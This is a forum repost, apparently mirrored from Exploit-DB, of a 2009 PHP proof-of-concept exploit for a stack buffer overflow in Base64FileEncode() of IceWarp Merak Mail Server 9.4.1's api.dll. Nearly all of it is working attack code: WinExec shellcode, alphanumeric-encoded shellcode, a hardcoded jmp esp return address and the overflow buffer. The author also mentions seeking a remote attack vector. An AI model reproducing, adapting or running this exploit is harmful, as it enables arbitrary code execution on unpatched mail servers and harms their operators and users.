Exploit Icewarp Merak Mail Server 9.4.1 - 'Base64FileEncode()' Buffer Overflow (PoC)

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
8542
Проверка EDB
  1. Пройдено
Автор
NINE:SITUATIONS:GROUP
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-1516
Дата публикации
2009-04-27
PHP:
<?php
/* Icewarp Merak Mail Server 9.4.1 IceWarpServer.APIObject/api.dll
   Base64FileEncode() stack based buffer overflow poc
   by Nine:Situations:Group::surfista
   site: http://retrogod.altervista.org/

   api.dll contains a stack based buffer overflow in the second argument of
   Base64FileEncode() method, this shared library can be loaded ex. by the
   IceWarp PHP extension which is carried by the Webmail service. You have
   interesting results if the final argument of the icewarp_apiobjectcall()
   function is exposed to remote user input, which is possible by design, with
   the vulnerable method specified.
   We are searching a remote vector for this!

*/

if (php_sapi_name() <> "cgi-fcgi") {
        die("Launch from the merak php console!");
    }

if (!function_exists("icewarp_apiobjectcall")) {
        die("You need the icewarp extension loaded!");
   }

$shellcode= //original scode, alpha2 esp <sh.txt
"\xeb\x13\x5b\x31\xc0\x50\x31\xc0\x88\x43\x4a\x53".
"\xbb\x0d\x25\x86\x7c". //WinExec, kernel32.dll XP SP3
"\xff\xd3\x31\xc0\xe8\xe8\xff\xff\xff".
"cmd /c start calc && ".
"\xff";

$shellcode="TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP".
           "8ABuJIJK5CCktqO0rpP1kpOxcsczF3OKdMUumVQlkON3P1".
           "YPkXhhyokOyo1sPmST10FOqs7PSCrT1q3BrT5pRCaqPlRC".
           "wPQ6EvgPKOksA";

$eip="\x2c\x47\x4b\x01"; //jmp esp - icewarpphp.dll

$bof=str_repeat("A",0x258).
    "BBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNN".
    $eip.
    $shellcode;

$_x = icewarp_apiobjectcall(0, '', 'IceWarpServer.APIObject');

$source="AAAA";
$destination=$bof;

icewarp_apiobjectcall( $_x, "Base64FileEncode", $source , $destination );

?>

# milw0rm.com [2009-04-27]
 
Источник
www.exploit-db.com

Похожие темы